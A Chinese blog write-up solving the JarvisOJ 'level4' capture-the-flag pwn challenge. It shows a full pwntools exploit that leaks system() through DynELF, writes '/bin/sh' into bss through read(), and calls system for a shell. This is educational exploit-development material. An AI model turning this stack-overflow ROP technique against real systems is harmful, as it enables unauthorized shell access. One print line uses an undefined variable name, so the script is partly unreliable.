JarvisOJ level4

最新推荐文章于 2023-04-08 14:44:07 发布
最新推荐文章于 2023-04-08 14:44:07 发布
阅读量2.2k 收藏 2
点赞数 2
分类专栏: ROP pwn 栈溢出 文章标签: pwn 栈溢出 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95081996
版权
pwn 同时被 3 个专栏收录
19 篇文章 1 订阅
订阅专栏
栈溢出
6 篇文章 0 订阅
订阅专栏
ROP
5 篇文章 0 订阅
订阅专栏

这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。

前言:

DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。
这是DynELF函数使用的一个模板:

def leak(address):
    payload=pad+p32(writeplt)+ret1+p32(1)+p32(address)+p32(4)
    io.sendline(payload)
    leak_sysaddr=io.recv(4)
    #print "%#x => %s" % (address, (leak_sysaddr or '').encode('hex'))   这里是测试用,可省略。
    return leak_sysaddr
d = DynELF(leak, elf=ELF("对应文件"))
sysaddr=d.lookup("system","libc")

pad为填充的垃圾数据,ret1为返回的地址(因为这里要重复利用漏洞,所以要选择有效合理的返回地址)。

详细使用方法请看安全客的技术分享:https://www.anquanke.com/post/id/85129
利用DynELF函数,我们可以泄露出system函数的地址,但是我们怎么找到/bin/sh呢?,当然文件本身是没有的,我们也没有办法泄露出来,怎么办呢?

这里我们就可以通过题目中含有的read函数,把/bin/sh读入进去,记住bss段的地址,再使用system函数调用就好了。
bss段
拿到题目,我们仍然是查看一下保护:
在这里插入图片描述
这是一个32位的程序,并且开了NX保护(开了堆栈不可执行,但是/bin/sh是参数,不是要执行的函数,函数system并不是我们填写到堆栈中的)。
接下来,我们开始找个个需要用到函数的地址:
我们要用到的函数有:
vulnerable_function()函数:
在这里插入图片描述
我们需要用他来做返回地址,才能够多次利用漏洞。
bss段地址(这个前面已经贴了图了)
write()函数的plt地址和read()函数的plt地址(这个虽然IDA可以直接查找到,但是我们可以用pwntools工具帮我们查找,更加省事 ,那怕是不一定)
找到所有的地址后我们就可以构造payload了,这里我构造了三个payload,当然,一些大佬使用 pop_pop_pop_ret 只构造两个payload也是非常适用的,我这里就不贴出大佬们的方法了。
下面是完整的exp:

#!/usr/bin/env python
from pwn import *
io=remote("pwn2.jarvisoj.com",9880)
elf=ELF("./level4")
vulner_function_address=0x804844B
write_plt=elf.plt["write"]
read_plt=elf.plt["read"]
bss_addr=0x0804a024
def leak(address):
    payload="a"*0x88+"aaaa"+p32(write_plt)+p32(vulner_function_address)+p32(1)+p32(address)+p32(4)
    io.sendline(payload)
    leak_sysaddr=io.recv(4)
    print "%#x => %s" % (address, (leak_sysaddr or '').encode('hex'))   #调试用可省略(最好是省略)
    return leak_sysaddr
d = DynELF(leak, elf=ELF("./level4"))
sys_addr=d.lookup("system","libc")
print hex(sysaddr)
payload1="a"*0x88+"aaaa"+p32(read_plt)+p32(vulner_function_address)+p32(1)+p32(bss_addr)+p32(8)
io.sendline(payload1)
io.sendline("/bin/sh")
payload2="a"*0x88+"aaaa"+p32(sys_addr)+p32(vulner_function_address)+p32(bss_addr)
io.sendline(payload2)
io.interactive()

运行结果:

在这里插入图片描述
由于这种题目flag不变,就码掉了,见谅!

PLpa、
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
盘点CSS Selectors Level4中新增的选择器
09-22
CSS 选择器在实践中是非常常用的,无论是在写样式上或是在 JS 中选择 DOM 元素都需要用到。在 CSS Selectors Level 4 中,工作组继续为选择器标准添加了更丰富的选择器。需要的朋友们下面随着小编来一起学习学习吧
[PWN] jarvisoj_level4 DynELF()函数使用总结
最新发布
LDX的博客
09-16 88
DynELF使用技巧和示例
Jarvis OJ --level4
Kni9hT's Blog
11-11 244
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
jarvisoj_level4
个人笔记
04-08 129
思路:ret2libc,泄露_write来获取Libc基址。3,IDA静态查看是否有ret利用点。
Jarvis OJ Level4
qq_39153421的博客
09-19 375
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 399
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
logging level级别介绍
09-17
4. `Level ERROR`: 错误级别,表示发生了错误,但程序还能继续运行。这通常用于捕获并记录异常,帮助识别错误源头,但不影响用户的基本使用。 5. `Level FATAL`: 致命错误级别,意味着程序遇到了严重的问题,通常会...
2020-L1V4.pdf
02-28
2020-L1V4.pdf
level shift电平转换芯片 18V/3V
06-08
4. onsemi公司:Level Shift电平转换芯片是由onsemi公司生产的。 onsemi公司是全球领先的半导体公司,提供了广泛的半导体产品和解决方案。onsemi公司的产品和解决方案广泛应用于各种行业,如汽车、消费电子、工业...
日本語Level 3 Level 4
12-07
日本語Level 3 Level 4 需要大于20个字符,不支持HTML标签。
BUUCTF jarvisoj_level3
红叶的博客
10-27 328
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 238
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF-jarvisoj_level4
Rt1Text的博客
12-04 168
很明显的栈溢出,没有system(bin/sh) 32位的ret2libc3老规矩的脚本
[BUUCTF]PWN--------jarvisoj_level4
BangSen1的博客
04-02 309
jarvisoj_level4 例行检查,32位,开启NX保护 运行一下 用IDA打开。查看主函数 查看vulnerable_function()函数 buf存在溢出漏洞。 是一道ret2libc类型的题目。 利用第一次溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回重新执行主函数。 再利用第二次栈溢出跳转执行system("/bin/sh") from pwn import * from LibcSearcher import * context(os = "
jarvis oj level4
发蝴蝶和大脑斧的博客
12-05 594
level3相比没有提供libc.so文件。学习使用Dynelf: def leak(address):
jarvisoj level4 wp ROP及DynELF模块
ditto的博客
12-31 509
拿到题目 开启了NX。 放IDA里: 栈溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值